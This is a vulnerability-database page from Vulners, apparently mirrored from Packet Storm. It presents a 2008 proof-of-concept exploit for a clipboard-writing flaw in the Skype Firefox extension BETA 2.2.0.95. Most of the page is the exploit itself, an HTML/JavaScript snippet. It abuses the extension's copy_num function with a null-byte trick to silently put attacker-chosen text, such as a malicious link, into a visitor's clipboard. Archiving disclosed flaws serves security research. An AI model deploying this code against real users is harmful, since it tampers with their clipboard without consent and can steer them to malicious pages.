Lucene search

K

skype-poc.txt

๐Ÿ—“๏ธย 07 Oct 2008ย 00:00:00Reported byย irk4zTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 15ย Views

Skype Firefox extension BETA 2.2.0.95 Clipboard Writing Vulnerability Po

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`<!---------------------------------------------------------------------------  
Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing Vulnerability PoC  
download: https://developer.skype.com/SkypeToolbars  
  
Author: irk4z[at]yahoo.pl  
homepage: http://irk4z.wordpress.com/  
  
greets: all friends   
---------------------------------------------------------------------------->  
<a href="#" onclick="check_it();" >test it!</a>  
  
  
<script type="text/javascript">  
  
function copy_to_clipboard( text ){  
if (skype_tool) {  
var copy_it = text + '\0+'; //use null byte to copy value, because '+' char must be in string  
skype_tool.copy_num( copy_it );  
}  
}  
  
function check_it(){  
//copy_to_clipboard('malicious text!!!!!!!!!!!\n\n\n!!');  
//copy_to_clipboard('http://irk4z.wordpress.com/');  
copy_to_clipboard('http://malicious.link.to.bad.page/');  
alert('Done! Check your clipboard!');  
}  
  
</script>  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
07 Oct 2008 00:00Current
7.4High risk
Vulners AI Score7.4
15
.json
Report